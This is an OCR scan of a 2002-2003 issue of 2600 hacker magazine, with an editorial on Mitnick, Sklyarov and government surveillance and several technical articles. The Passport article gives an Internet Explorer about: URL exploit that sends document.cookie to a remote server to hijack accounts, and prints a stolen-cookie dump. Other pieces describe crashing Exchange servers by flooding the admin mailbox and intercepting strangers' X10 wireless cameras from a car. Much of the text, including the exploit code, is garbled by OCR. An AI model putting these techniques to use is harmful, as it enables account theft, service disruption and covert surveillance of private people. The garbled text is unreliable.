Volume Nineteen, Number Four Winter 2002-2003,55.00 US.S7.15 CAN "Voice or no voice, the people can always be brought to the bidding of the leaders. That is easy. All you have to do is tell them they are being attacked, and denounce the peacemakers for lack of patriotism and exposing the country to danger. It works the same in any country." - Hermann Goering, Hitler's designated successor, before being sentenced to death at the Nuremberg trials. Editor-ln-Chie f Emmanuel Goldstein layout and Design Shape Shifter Cover Photo Fur Harald & Erhard Cover Design Mike Essl Office Manager Tampruf Writers; Berme S-, Billsf , Eric Corley, Dalai, John Drake, Paul Estev, Mr. French, Javaman, Joe630, Kingpin, Lucky225, Kevin Mitnick, mlc, The Prophet, David Ruderman, Seraf, Silent Switchman, Mr. Upsetter Webmasters: Juintz, Kerry Network Operations: mfc, Seraf Broadcast Coordinators: Juintz, Pete, daRonin, Digital Mercenary, Monarch, w3rd, Gehenna ##?C Admins: Antipent, DaRonin, Digital Mercenary, Redhackt, Roadie, Setient, The Electronic Delinquent Inspirational Music: Death in Vegas, Good Courage, Tom Petty, Monoman, Royal Trux, Holger Czukay, Space Ro- bot Scientists Shout Outs: Ed Hemstadt, LOcke, Tim Pritlove, Tina, Zapphire 2600! ISSN 0749-385 1 ) is published quarterly by 2600 Enterprises Inc. 7 Strong s tone, Setauket NY 11733. Second class postage permit paid at Seiauket. New York. POSTMASTER: Send address changes to 2600. P.0. Box 752. Middle Island. NY 11953-0752. Copyright (c) 2002 2600 Enterprises, Inc, Yearly subscription: U S. and Canada - S20 individual. $50 corporate (U.S. funds). Overseas - S30 individual. S65 corporate. Back issues available for 1984-200! at S20 per year. S25 per year overseas. Indiv idual issues available from 1988 on at 55 each. $6,25 each overseas. ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO: 2600 Subscription Dept.. PO. Box 752. Middle Island. NY 11953-0752 (subs@2600.com). | FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO: . 2600 Editorial Dept., P.0. Box 99. Middle Island. NY 11953-0099 (letters@2600.com. aitieles@2600.com i 2600 Office Line: 631-751-2600 2600 FAX Line: 631- 474-2677 Material p Positivity -Passport Hacking Revisited 4 6 ^-Lazy Exchange Admins 7 pWarspying 9 pCD Media Data Destruction 10 i-’How to Make a DVD Backup 12 • Honeypots: Building the Better Hacker 15 [-DNS Redirection Stopped 16 [•'More on Telemarketing 18 p Cracking Voter Fraud 20 pLinux on the Xbox 21 pRemoving Spyware and Adware 23 I | Exposing the Coin star Network 25 pA Dumpster Diving Treasure 26 [-DMCA vs. DMCRA 27 p Letters 30 r~.ncsc.mil (144.51.x.x) 40 A Brief Introduction to Oeepfreeze 46 Beating Download Manager Protection 53 ' [-DHCP is Your Friend! 54 p Marketplace 56 L -’ Meetings 58 In the fast paced culture that we seem to find ourselves caught in the middle of, it's very easy to get stuck in a default mood of euphoria or de- spair Lately it seems that we've been despairing quite a bit. We're certainly not alone. While it's very important to not lose sight of the bad and ominous things that are happening m the world of technology and what it could do to people like us, nothing is gained if we lose our overall positive outlook. We certainly couldn't have kept on publishing for nearly twenty years if we didn’t feel a strong sense of hope for the future. There will never be a shortage of negative issues to focus upon. Let's take a brief moment to look at the positive developments. By the time you read this (and hopefully bar- ring any last minute unfortunate circum- stances), the excruciatingly long ordeal of Kevin Mitnick will have finally reached an end. January 20, 2003 w as the date that Mitnick’s su- pervised release came to an end - three years af- ter his release from prison. That means that he will once again be able to use the Internet, travel without having to ask permission, and talk to anyone he wishes to without having to check to see if they've ever been convicted of a crime. Most oi us take these freedoms for granted so it’s hard lo even imagine what life must be like without them. In these past three years. Milnick has be- come a model for someone who can overcome adversity and triumph in the end. Despite five years of isolation and the aforementioned re- strictive conditions upon his release, he refused to lei the system defeat him. The authorities made it almost impossible for him to earn a liv- ing - insisting that he not be allowed anywhere near a computer and atone point suggesting that he pursue a career in fast food. Instead Mitnick landed a job at a major talk radio station and an- swered listener questions about technology. He had kept himself educated on all the technologi- cal advances, despite being incarcerated and forbidden from experimenting with them upon his release. More recently he had a book pub- lished on the intricacies of social engineering and wem on a government-approved speaking tour to promote it. Throughout this, Mitnick found time to testify before a Senate subcom- mittee on the dangers of bad technology and un informed people. He also provided key evidence in a case against Sprint who had the audacity to claim that their switches were uohackable. It would have been easy to dwell on the neg- ative in this case - and there certainly was in> shortage of negativity. After all, Mitnick hadn’t actually had a real day of freedom since 3988 meaning that when all is said and done, fifteen years will have gone by since this ah started. And in all that lime, there was never a charge filed against Mitnick of anything more substan- tial than making free phone calls and looking at source code that didn't belong to him. It w as all ail incredible waste of time. But we get nowhere by letting our bitterness dictate how we live. We have everything to gain by continuing forward in our spirit of curiosity, education, and rebellion against conformity. There's always a price to pay in order to take those steps and sometimes it's a heavy price. Dmitry Sklyarov spent Lime in an American prison and was unable to return to his native Russia for nearly six months - simply because be wrote a program that could be* used in a way that violated the absurd Digital Millennium Copyright Act. ft made no difference that he wrote the program in another country. Even Adobe, the company that originally pressed charges against Sklyarov, realized how ridicu- lous the whole thing was and tried to drop it. But it was too late and the American justice sys- tem wen! to work, eventually putting Sklyarov's company (Elcomsoft) on trial instead in ex- change for his testimony. The authorities didn't count on the defendants putting on a strong fight and they didn't count on the massive show of support for Sklyarov. There's a reason so few cases ever make it to a jury. People are rightfully terrified of the sys tern and what it can do to them. It s ironic that ii took someone from outside our country to stand up to the system and refuse to be intimidated. The trial took place m December and it only took the jury one day to rule in Sklyarov's and Elcomsoft's favor. Page 4 2600 Magazine Part of the DMCA stipulates that there has to he intent and this was something the jury w'as unable to hnd in this case. It doesn't address the overall stupidity of the law itself which means there will be more such cases. But it’s a good sian and a significant step towards fixing the numerous problems caused by this horrible leg- islation, And most importantly, it's proof I hat determination and standing by one s convictions can ultimately lead to victory. We have to also remember that there's a big world out there, one that doesn't always initially grasp the importance of the issues we value. It's easy to dismiss the general public as ignorant and pawns of the mass media. But. as in all things, the truth is never quite that simple. The general public can get it, they do tend to value the things that we do, and they are most defi- nitely not the enemy, fhe jury in the Elcomsoft case is living proof of this. The key is getting the message out. Over the pasL year or so we've reported (along with many others) some of the really bad ideas that have been passed down from Capitol Hill as a "response" to terrorism - things like the Patriot Act, the Homeland Security color scheme, Operation TIPS, Total Information Awareness, etc. And while many of these things are still around, public awareness and public criticism has soared - and it’s most definitely made a difference. People are taking more time to think these things through and more of them seem to be re- alizing that diminishing our freedoms really is- n't going to accomplish a whole lot - other Than diminishing our freedoms, Weve seen less talk of the alert siatus color coding system as it becomes mocked more than it’s used. The TIPS system was heavily criticized for its Stasi-like system of informing on ones neighbors and having untrained civilians prowl- ing around looking for potential though tcri me. And in true Orwellian style, all mention of TIPS was removed from the citizcncorps.gov website where it had been prominently featured. It never happened. The Total Information Awareness initiative is still very much with us. In their own words, TIA is meant to be a "total re invention of tech- nologies for storing and accessing informa- tion... although database size will no longer be measured in the traditional sense, the amounts of data that will need to be stored and accessed will be unprecedented, measured in petabytes." All of this will supposedly identify terrorists by having every conceivable bit of data easily available - from medical records to credit card purchases to Internet activity. It doesn't take much lo figure out that since they don’t know who the terrorists are they will have to scruti- nize all of us using these yet to he invented tools. It's clearly a sensitive topic lor the folks at Defense Advanced Research Projects Agency (DARPA) who won’t even reveal how much money is being allocated for this. While public pressure lias yet to kilt this beast, its probably one of the few things I hat can. Public ridicule has already put an end lo the TIA logo - a pyra- mid with an all seeing eye within it, apparently looking out over the globe. That also never happened. As wc go to press, yet another monitoring plan is being announced - this time one that makes Carnivore look friendly. It s part of a re- port entitled Tl Fhe National Strategy to Secure Cyberspace" and it would require Internet Ser- vice Providers to participate in a centralized system that would theoretically allow the entire Internet to be monitored along with its users. The apparent frustration the government is feel- ing is summed up in this statement by one of the plan’s coordinators: "We don’! have anybody that is able to look at the enti re picture. When something is happening, we don'i know it s hap- pening until ifs lex) late.” That is why the plan will fail. What they want is not only impossible but it flies in the face of everything Lhe net rep- resents. ll would be the equivalent of wiretap- ping everyone at all times and we suspect most people just aren’t going to go for that. Expect a backlash on this like nothing we've ever seen - if this scheme even makes it to spring. Absurd and ridiculous as some of these plans may be, it’s no excuse for not remaining vigilant and fighting those who endanger our freedom. Our victories may appear to be few and far between but they are quite significant As is the fact that none of them could have been accomplished without a degree of organization and activism. Whether the cause is ending the suffering of a single person, overturning a really bad law T or preserving everyone’s right to pri- vacy, reaching out to like-minded individuals and helping to make it a major issue is critical. It s gotten us this far and it will continue to be our strongest weapon. Winter 2002-2003 Page 5 by Chris Shiflett ch r is @ shifletLo r g This article is a follow-up article to 41 Pass- port Hacking," an article published in 18:3. Much of the information here is given under the assumption that you are familiar with the original article, so you should read it first. The original article was the first to reveal the secu- rity vulnerability in Microsoft Passport that prompted Microsoft to discontinue the Passport service for a short period of time while im- provements were made. Other articles have ap- peared since the original, and U has been translated into several different languages, Un- fortunately, the Passport mechanism possesses the same fundamental flaws that it did when the original article was written, though attempts have been made to mitigate these risks by im- posing shorter timeout periods and requiring users to re-authenticate themselves more often. Background In "Passport Hacking," I introduced the Mi- crosoft Passport mechanism and its inherent in- security characterised by a complete dependence on cookies. Though cookies can be an adequate means of maintaining state in HI TP transactions, they are a poor choice for user authentication. Using cookies and URL variables, Microsoft communicates with Pass- port enabled sites through the user alone; there is no server to server communication. This is the fundamental design flaw that exposes Pass- port users to all of the security vulnerabilities that have been published to date. Hie vulnerability used to compromise a Passport account in i he original article involved using a malformed URL to expose a users cookies to an unauthorized website. This vul- nerability only existed in Microsoft InLernet Explorer versions 4,0 - 5.0, so this technique could not be used to compromise the Passport account of people using Internet Explorer ver- sions 5,5 and 6,0. This article will demonstrate a technique (hat can be used to compromise the accounts of people who use these newer ver- sions of Internet Explorer and will direct Inter- net Explorer users to the patch that will fix this vulnerability. The Vulnerability The vulnerability that exists in Internet Ex- plorer versions 5.5 and 6,0 was originally a I luded to on the web at http://www. solution s- . li/i nde x .eg i/ new s _ 200 1 _ 1 1 _08 ?l ang =eng , I a order for a website to gain unauthorized access to a user's cookies, an about: URL is used to de- ceive the web browser so that h executes client- side scripts in the local context with regards to security restrictions. Thus, a client-side script can potentially have as much access to your computer as you do. An example of a URL exploiting this vul- I nerability is the following; ah* >u t ://a I ert( Th i s % 20brow ser% 2()i 20v u I neru hie / ) | A vulnerable browser will execute this client-side script, which will display the fol- lowing alert box: The significance of this is more extreme than this example illustrates. Because Internet Explorer executes this client -side script in the local context, this script has fewer security re- strict ions than client-side scripts that Internet Explorer believes to be sent from a remote web server In addition, we can make a simple mod- ification to our URL to make the domain cheek- ing mechanism in Internet Explorer mistake the URL for one from any domain we choose when it checks for cookie restrictions. For example: abou t :// w w w. pas s pt m .Co m/a 1 e rt t doc u mem coo k t e K/sc ri pt> If you are currently logged into Microsoft Passport when visiting this URL, an alert box similar to the follow ing will appear: Page 6 2600 Magazine A MSPPre«p3£SPD[t@k3ab^ orq. Browse*! est Success?; MSRAuth*5T CH 22BZXDFSwY7!1 CE iq5B i?aM t£ 1 TW^SHNBqVAtvsWFWbOC&^na* J S wlwG tarvM aSSfl^JpOX vqpfc FStTdbhQtft MSPProt»5T CH 22BZXB' WQ zkqrnJ bOeIXE sQtnriQ T araQJ qQ iqiARjAVT 0 vM mTM hKQflZRomtXvUZSVLO KWtJl £pl3 Dei pHblBY gi3J pJ F'pB zD xvJwdoSV.tMS ei.Vf 3taU L ghgSByez? OqpZpD' WN [pvv4i*FHkfl5M' voSNzuvKIi KJ U Xril IE qflgYoZk % MSPV»*3 All cookies that would be made available to a server-side script in the www, passport.com do- main will appear in the alert box. The signi he a nee of this example is that we now have a technique for executing a client- side script that has access to any cookies from any domain we choose. When combined with Passports complete dependence on cookies, the danger should be clear. The Compromise The only step remaining fora complete com- promise is to establish a method to gel the cook- ies sent to the web server where they can be stored and subsequently retrieved by the im- poster, To do this, I w ill use a URl similar to the last example, except that the script will redirect the user to a remote URL and append the cookie data in the query siring of that URL: a bou t ://ww w. passport , c o n i/doc u men t doc at i o n='http : //shi - flett.org/de mos/passport_h acking_re v is ited/?coo ktes=’+docu meni.cookie The most dangerous Characteristic of this technique is that no interaction from the user is required. Because of this characteristic, an at- tacker canned inect the user through many URLs that will compromise the cookies from many dif- ferent domains rather than just one. This makes Internet Explorer versions 5.5 and 6.0 even more dangerous than the previous versions with re- gards to cookies, hi addition, tins compromise is even easier to achieve than the original, requiring very little expertise on the part of the attacker. Once the cookies are stored on the web server. a technique must be established to store these cookies on an imposter's web browser. Many methods can be utilized for this step, and the orig- inal article gives sample code for one. This Itnal step will complete the impersonation, and the im- poster can then pose as the user whose account was compromised by visiting any Passport enabled website. Summary Due to the fundamental Haws in the design of the Passport mechanism, I do not recommend that it be used in conjunction with sensitive data os personal information. The convenience is not worth the security riskv and it is likely that this article does not represent the last of such risks. As 1 mentioned earlier, the mechanism used is fun- damentally flawed; articles such aa this merely describe techniques that can be used to exploit these Haws, For those who are currently using a vulnerable Web browser and wish to continue to use it. visit hltp://www,microsoft. com/window s/ieAlo wn - loads/critieal/q3 1 3675/defauU.asp and install the Security patch. There are many websites that uti- lize cookies in order to maintain state, and using a vulnerable browser places you at risk of many at- tacks similar to the one described here. An interactive demonstration of the technique described in this article is located at lutp://shi- flett.org/de i n o s/ pas s port_hac ki ng _re v is i ted/ . Lazy Exchange admins by ddShelby Security in Exchange is or should be a con- cern for many admins out there because of its fairly widespread use in many small to mid sized organizations. It does have some worthy Features but also has some serious security concerns ( like everything from Redmond J that need to be at- tended to. And that is the purpose of this article. To inform and educate those who read it and maybe expose a few Exchange admins to some information they might lind useful. So let's get started. As an admin you have the ability to create an account during install that is not the same as the default administrator account in the OS, But not many elect to do this because of the log on/log off hassle to administer the OS along with a separate account to administer Exchange, If a separate Ex- change admin account was not created at the time of install (which is almost always the case) and it’s an NT4 server, then it's almost guaranteed that adminislrator@whoever.com exists, because you can't rename the administrator account for the OS in NT, If it's a Win2K server with Exchange 5.5 Winter 2002-2003 Page 7 or Exchange 2000, the same is also true. But with the ability to rename the default administrator ac- count iii die OS, there is a chance it was renamed at the time ot setup. In both cases (assuming de- fault! the administrator account for the OS has an SMTP address that follows the convention: ad- ministrator^ 1 whoever.com, If the OS is NT4. then it's a shoe- in unless the SM TP settings were edited by the admin. This is the problem. Some Basics of Exchange The standard version of Exchange 5.5 and 2000 both have a limit on the size of either the public or private database tpriv.edb and pub.edb). They cannot exceed 16 GB each, t he Enterprise versions of 5.5 and 2000 tire not limited to any- thing except available drive space. With server drive space still somewhat costly (assuming the server runs with some form of SCSI and raid), reaching this limit is not difficult for most organi- zations of a dozen users or more. Two reasons why ifs so easy to get to 16 GB or reach the servers available drive space limit is the disre- gard of most admins towards limiting users' mail- box size and the users' habit of using Outlook deleted items folder as an archive folder. The ad- min has Lhe ability to force notification limits on users' mailbox size on either a global or per user basis, l he spam issue is also partly to blame since everyone just deletes it, but the mentality of using the deleted items folder as an archive comes back to haunt again* only adding lo the total size of the database. So the 16 GB limit is in many cases closer than one might think. This is especially true if none of the limits were ever put in place and the server has been in use for a year or longer. It's made worse by Lhe fact that small organiza- tions don't need a monster server to run Exchange 5.5 and with the hardware requirements set forth by Win2K server* many have elected to stay with NT4 and Exchange 5,5, An NT4/Exdmnge 5,5 server could easily serve a dozen users on a F200 with 32 megs of ram and a single 10 GB IDE drive. Don't laugh. I ve seen it. Gening back to the point* Any Exchange server is vulnerable to getting swamped and not by some new hack. You can crash Exchange by simply knowing any e-mail address of any recipi- ent on any given server. The ugly part is this could potentially happen over days or weeks or even months before it's even noticed or it's just too late. Since Exchange by default has an ac- count assigned to the Administrator of the OS, an SM T P address exists for it. If you assume that the administrator account is not actually in use but still exists* one could theoretically swamp an Ex- change server by sending numerous e-mails with large bogus attachments. Or if the sender's ISP does not impose limits on the size of outgoing mail, one large attachment could do the same. To use any general user's address is slightly more difficult since users usually read their mail. But the administrator account is almost never used since admins set up an address for themselves an ! use it instead. As drive space comes close to zero available, the Exchange service that handles SMTP (IMS) shuts down and all incoming mail is rejected, Bui since the information store service (the database) usually continues to run, and if the admin is smart enough to check the private information store listed in Exchange Admin, he would see the tremendous size of the mailbox and then just log into it and clean it out. An easy fix for Lhls is to just edit the SMTP address of the administrator account to something ohscure* In addition, you could disable any unused SMTP addresses to help prevent getting swamped. A periodic check of available drive space or the size of (he .edb files would be useful, but seems to escape many admins. But Wait, It Gets Worse As opposed to reaching the drive space limit, il the 16GB database limit is reached instead, it becomes a whole different story* If the Enterprise version is installed before the 16 GB limit is reached* then disaster can be avoided* However, d the 16GB limit is reached before upgrading, the information store service is shut down automati- cally and can't be restarted The result from this is all incoming SMTP messages are rejected at the server and no user can log in to their respec- tive mailbox. And lhe admin can't get the service started to log in and delete the offending content. As an admin you can purchase the Enterprise edi- tion for two grand* hut installing it on top of lhe standard edition doesn't quite solve the problem All is not lost - there is a workaround for this listed in the Knowledge Base that explains how to copy the database into the active folder (usually exchsrvAM DBDATA) after you install the Enter- prise version. But if lhe database has reached the 16GB limit you'll be copying for a while. If the admin is savvy enough, he could play the game of just renaming folders instead of copying. But with so many Windows admins who changed ca- reers from grocery bagging, it's unlikely they're smart enough to figure that out. And as the Knowledge Base article suggests to copy the edb file* it seems to me that at least one employee at Redmond didn't figure it out either. Admins could also defrag the database with a utility included with Exchange in the exchsrvr\bid folder called eseutil (both 5*5 and 2000). This would buy enough time to delete enough and recover. But il the SMTP service IMS is running and email rs still incoming, it could be a race to delete before it 2600 Magazine reaches its limit again. In addition, Lhe delrag needs drive space equal lo or greater than the size of the database* But this inevitably brings me back to admins who were bagging groceries six months ago. Another safety net would be to im- plement a second MX record for the domain with a higher cost route, so any incoming mail rejected by Exchange would be collected on another ma- chine. Then with ETRN you could dequeue the mail from Lhe higher cost server and no mail would be lost. Discovery of a Server Regardless of the presence of a firewall, by using one of the many port scanners an Exchange by Particle Bored Are you having a hard time figuring out what to do wiLh your X 1 0 camera now dial you are done playing practical jokes on friends and fam- ily? For less than $50 you can pul the X10 re- ceiver in your car and begin screwing around with complete strangers* Standard disclaimer: I don't accept responsi- bility for my own actions* so l definitely won t as- sume responsibility for yours, If TVs in vehicles are illegal in your area, or should you get decapi- tated from a TV Hying around in your ear it's your problem. Here is what you will need to get started: Jensen J53-RW TV/Monitor (only $25 at Target) KI0 Receiver DC Power cord with "f," connector DC Power "Y r adapter Velcro The Jensen TV is a 5" black and white portable monitor that has both video and audio RCA input jacks. It can run on AC* DC, or batter- ies and comes w ilh a car lighter adapter. The X 1 0 receiver is intended for indoor use, so it is shipped with only an AC adapter. If you look at the output of the adapter though, you'll see that it is 12 volt i >C which means you can run the receiver straight off your car battery. Since 1 wanted the system to he easily removed, I de- cided to power it with another lighter cord (the one with the "L" connector). It is positive- tipped, so make sure you have the polarity right* Now plug everything together* Nearly all of the connectors can only go in one place. The RCA connectors are fully color-coded, so if you Winter 2002-2003 Win2K laptop but many oLhers work just the same, A scan of a range of addresses to port 25 will eventually reveal an open port. If it's an Ex- change server it will identify itself as such* as well as the version and build. For example, 25 S M fit ' 220 sc rve r. do ma i n . w hoe ver. co m HS M T P Server (Microsoft Exchange Internet Mail Ser- vice 5*5.2653.13) ready. In this example it's a 5.5 SP4 server. With that, the domain is known* the administrator address can be correctly assumed 95 percent of the time or belter, and the rest is up to any delinquent with nothing better to do. Or at some point some worm will make its way to the Internet and play this same game, only faster* can't figure out how to do it, lire up the IM client on your Mac and ask your grandmother. I mounted the monitor and receiver on my dashboard with Velcro. If this method obstructs your view you can put the monitor on the passen- ger scat or floor. Make sure you don't mount any- thing where it might hinder the deployment of an airbag. Now hit the road. 1 found my first camera within 61) seconds on the very next block. 1 typically find one about every 15 minutes. In closing here are a few things I learned the first day: - Don't worry about the channel switch on your receiver - most folks leave it on the default channel "A‘\ - The transmitters have a range of only around 100 yards so you w ill need to be somewhat dose to your target. - You'll lend to get audio before video* so you'll know you are onto something when the sta- tic on Lhe TV goes away* Keep your eyes tin the road and pull over when you start receiving audio, - You'll notice several definite patterns appear on the monitor at times* For example, I have seen both narrow and wide horizontal lines* If you identify the devices that cause them* write to the Letters section of 2600 and let everyone know. 1 would bet one of them is a 2*4 GHz cordless phone,.*, - I was able to get perfect cable TV twice. Is someone using wireless for extensions or something? server is easy Lo find, i use Super Scan on my Page 8 Page 9 by Gr3y I0qu3 gr ey loq ue @ pa l a d indesi gn ,ca While we as hackers have an obsession wilh freedom of speech we also have an obsession with dal a de struct ion. 1 wrote this article to quell my - and many other peoples' - interest in the lat- ter specifically dealing with CDs, I've heard nuking the CD in a microwave is not MX) percent successful in destroying the data 11 was stated in "How to Hack From a Ram Disk" in 18:4. I tried to find information on this topic but there really is none out there, so 1 decided to take this task on for myself. When 1 started doing research for this article J realized that there are many ways to destroy CD- ROM. CD-R* and CD-RW media. The first things l found were targeted towards commercial uses, I found products that used "micro indenta- tion H " to "reliably penetrate the data surface of target media, destroying any readable daia" and as a side effect the CD went from round to an oval shape Sure sounds good, right? Well if you have $5k to waste it’s great. Then there's some i hat grind away the recording surface. The one I found cost $1GL Both of these solutions are not priced for the average person. Simply deleting the filev from a CD-RGM/R/RW won't work ei- i her, There are plenty of software suites out ihere for recovering data from them. 1 found one for $39,95 and there was even a free 30 day trial. So if you have a low tech adversary you're hiding the data from even that wouldn't work. The soft- ware can also recover data from quick formatted CD-RWs, where the data is left there just to be overwritten at a laier time (the same concept as recovering deleted data from your hand drive - the reference to the data in the drive table is re- moved. the data isn't touched). Let's gel to ihe main point of the article: Does data destruction with a microwave really work? First, to understand if the microwave is an ef- fective way to destroy data you need to under- siand how CDs are made. All three types of CD f C D - RO M * CD- R, a n d CD- R’ W ) are d i IT ere ni. In the next little while I'm going to look al the three different types and explore if it will work for each. CD-ROMs are exactly what they say, CDs with Read Only Memory, Most of a CD-ROM consists of a piece of dear polycarbonate plastic. During manufacturing, this plastic is impressed with microscopic pits arranged as a single, con- tinuous, extremely long spiral track of data. Once the plastic is formed, a thin, reflective aluminum layer is 'sputtered" onto the disc* covering the bumps. Then a thin acrylic layer is sprayed over the aluminum to protect it. A CD reader reads CD-ROMs by sending out a laser beam that passes through the plastic layer, reflects oft the aluminum layer and hits a device dial detects changes in the amount of light it receives, I he bumps, commonly called pits because if you could see them they would look like pits from the label side of the CD-ROM, reflect the light dif- ferently from ihe lands. The lands arc ihe rest of the aluminum layer. The aluminum layer is very, very thin* When you nuke a disk, large currents flow through ihe aluminum, These currents pro- duce enough heat to vaporize the aluminum. You then see a very small lightning storm as electric arcs go through the vaporized aluminum. There will be many paths left etched through the alu- minum after this. So with the aluminum vapor- ized a CD player won't be able lo read the data anymore. Because of the extreme heat of the alu milium the plastic above and below the alu- minum would also be damaged. I'd he guessing the aluminum paths left would be horribly warped. Just think about what w r ould happen to you if you were subjected to l hat kind of heal I'm fairly confident that this is a 100 percent se- cure method of data destruction as you would nul be able to somehow inject a new reflective mate- rial and fill up i lie microscopic pics as they would he damaged. Sure, l hat's all great if you happen to have a Wrndoze CD silling around that you don't w ? ant anyone to have to experience the horror of. So what about CD-Rs? Instead of ihere being, pits imprinted into the plastic of a CD-R there is an extra layer. This extra layer is a greenish dye righi below the reflective material. A write laser heats up the dye layer enough to make it opaque. The read laser in a CD player senses the differ- ence between dear dve and opaque dye the sami way it senses bumps - it picks up on the diffei ence in reflectivity. So when you nuke a CD-R the gold/aluminum layer vaporizes. If that is flic only effect then it would be possible to cut the CD where the aluminum/ gold layer used to lx* and then put a reflective substance on top of it and stick it in a CD player. This would require Page 10 2600 Magazine very, very fine instruments as a CD is only 1.2mm thick. But the main variable is how hot the aluminum/gold is w hen it vaporizes and if it is hot enough to change the state the dye is in - from transparent to making the whole disk opaque to a reader. From looking at a few nuked CD-Rs t think that most data would be lost. On a blank CD that is nuked, there is a "loose swirly 1 ' pattern of the different shades {written and un- written ), effectively making true data impossible to find. On CDs with data it would do the same and so a lot oJ data would lx 1 lost. So on CD-Rs it's not really a guaranteed process of having your data fully and completely removed. Al- though if you're up against someone like the NSA/FBI/C1A who are going to all ihe trouble to find that information you have far bigger prob- lems on your hands and I'm guessing you'd never see a public court, CD-RWs are a little different again. Instead of the dye layer there's a phase-change com- pound composed of silver, indium, antimony, and tellurium. This recording layer is sand- wiched between dielectric layers that draw ex- cess heat from the phase-change layer during the writing process, A CD-RW drive has to use three different lasers: a read laser, a write laser, and an erase laser. To write to a CD a laser beam heats areas of the phase-change material above the melting temperature (50O-70OC). so all the atoms in Lhis area can move rapidly into a liquid stale. I hen, j I cooled quickly enough, the random liq- uid slate docs not reorder its atoms back into a crystalline state. To erase, a laser heats the same area to above the crystallization point - 200C - and then lets it cool quickly so that the atoms re- order themselves. The read laser is much less powerful The dielectric layers that are above and below the phase-change compound are by defini- tion "poor conductors of electricity and w ill sus- tain the force of an electric field passing through it." So that would not allow much of the electric field caused by the microwave to be able to reach the phase-change compound layer where the data is stored. Bui then again, it's riot made to stand the bombardment by a microwave. Also, its a heal insulator so the temperatures caused by the reflective layer vaporizing will not affect it too much either. So again with advanced tools it mighL be possible to remove the damaged material and put on a new reflective layer. Unfortunately I have no way to find this out for sure. 1 would like someone to write a follow- up to this article with actual Lab data (Univer- sity). As you can see it is not known if microwaving is a 100 percent secure form of data removal tor CD-Rs and RWs. Il is one of the most secure options ihere is. It should hold up unless you have POTUS (President of the United Stales) really pissed off at you. Local police agencies and the FBI probably do not have the technology to retrieve daLH from a nuked CD. Most of the people who argue that this is possible also argue that "they" would just go back in time to before you nuked the CD.... Greetz: Spiff y and Syphet: BANKRUPTCY SERVICES U.C. AS CUSP AGENT FOR PSINET LIQUIDATING LLC HSBC BANK USA NEWVQHK. NY IDOE? MDflOtO 1103 CHECK NO, ‘iifee Dcdlr'Pli 12 Cents PAY TOTH* ORDER OF 5383KET PGBOXMfl WiDC-E ISLAND W T1SSJ □ATE Tirol AMOUNT SL3 12 HO n l^Fj p '1 ! 5J ii\T LJ F' : CO e iOO kOBfli: Ol2BOU75^ Some of you may remember a problem we had with a company called PS I back in 1995. To put it briefly, we were misled into signing a contract for ISDN service that didn't exist arid almost lost a sizable down payment Once we publicized the situation and stuck audio evidence of their deceit on our website, we got a refund in full. More recently, PS! went bankrupt (and no, we don't feel guilty). For some reason we wound up on their list of creditors and eventually received this check* They also managed to rename us from 2600 to 5393* We doiTt really understand any of it but if this is how they ran things, we may understand how they went bust. Winter 2002-2003 Page 11 r How to Make a DVDfi by Maniac Dan Disclaimer: Copying DVDs to sell or DVDs you &o not own is illegal and immoral and should not be done . After reading the letter in 19:3 questioning the methods of DVD copying, l decided to write an article detailing exactly how it's done, or at least get it close enough for normal people to make backups of their DVDs, I've only tested this on Region l NTSC DVDs. Readers in other countries should find a guide for their region and video formal. Sorry. 1 also find it useful to bring a stack of VCDs w ith rue on trips, since my laptop dt^sn't have DVD capabilities. Any- way, I'm going to detail the methods for ripping to either AVI, VCD. or SVCD. Some of the steps are the same, hut for steps that are differ- ent, I will assign them both a number and a let- ter. so 3(A) is the AVI instructions, 3(V) is VCD, and 3(S) is SVCD. Any step that applies to all three formats wall have no letters. In order to rip to AVI, you need Smart ripper and DVD2AVL To rip to VCD and SVCD, you need these files plus TMpgEne and BEJMpeg. Also, for the ripping process to work on XP or some versions of 2K, you need a valid aspi layer dri- ver. To bum your CDs you need soil ware that supports VCD and SVCD burning, like Nero. (Links for these programs are the end of this ar- ticled Now for the steps: I: Insert the DVD and play it for a few sec- onds in a software DVD player. This will "un- lock" the DVD and allow you to rip it using Sniartripper. 2: Load up Sniartripper and take a look around. At the bottom of the screen is a "Target" box which needs to be filled in with a valid folder name. The rest of the first page is chapter selection for if you only want to rip certain scenes (like Monty Python sketches). The sec- ond tab is called "Stream Processing" and al- lows you to select the languages and special tracks you want ripped. I usually just rip them all and then only convert ihe English track, but if you're hard pressed for drive space, then cut out what you don’t want. Next, click the settings tab. Under settings, 1 recommend setting key- check to "Every VOB File" and filespl tiling to ’Max Filesize", Now set the max-file size u ] 0,000MB (lOgb). This way the movie will he ripped to one big file on your hard disk. (Want ing I This is only possible wilh NTFS, If you have a FAT file system, set max-filesi/c lo 4,000MB,) I 3: Click start and wait until the DVD is finished. It shouldn't take more than an hour. 4: Fire up DVD2AVL Once again, I recoin mend taking a look around the program be fort blindly trying to follow my steps. Go to file jopen. A blank box will appear with three but- tons on the left side. Click "Add" and add the lile(s) you just ripped to the box, then click OK 5: Press F5 to make sure the movie tool OK and (he VOB files arc in the right order. You wilt not have audio and the video will be East, This is normal Make note of the aspect ratio OQ the box that pops up along the righL side. You are almost ready to convert to either AVI or d2v/wav. Check your menu settings. For audio! Track number should he "I", channel formal should be "Auto", Dolby Digital should be M Do code", MPEG Audio should be "Demux", ami 48- 144, l should be off. Video settings should bn left alone, 6(A): AVI users rejoice! This is the last su p for you! Go to file-]save AVL pick a filenunu and location, and click "Save 11 . Now a box pops up asking you to select your preferred video compression method. Choose your poison il recommend DivX 5.0.2) and click OK, then su back for a few hours while it converts. If the 1 is too large, find an AVI splitter out there. I’ve heard AVlChop is good. 6(VS): VCD and SVCDs need a few' morel steps. Still in DVD2AVI, click file-jsave pro ject. Name the project and click "Save". It will run through Ihe movie file once or twice and then beep when it finishes. This process should take less than the ripping process, but it depend* on your processor. Once it’s done, write dow n the contents of the "Aspect Ratio" and "Video Type" boxes. We need that informal ion i TMpgEne. 7: (From now cm, all unlettered steps reh i VCD and SVCD only, since AVI users should have stopped reading this already.) Now v 2600 Magazii h Page 12 have a *.d2v and a *.wav file. We need to merge these into a single MPG hie. Fire up TMpgEne, Once again, take a look at what it can do be lore trying to rip - this program in particular is very useful, I highly recommend playing with the "MPEG Tools" under the file menu. Now that you are ready to go, check out the bottom of the main TMpgEne screen. You have three boxes there: “Video Source", "Audio Source”, and "Output File Name". For video source, we want Ihe *.d2v file w r c just created, and for audio we want the *,wav file, (Side note: listen to the wave before finishing this step. If it s not the au- dio track you want, go 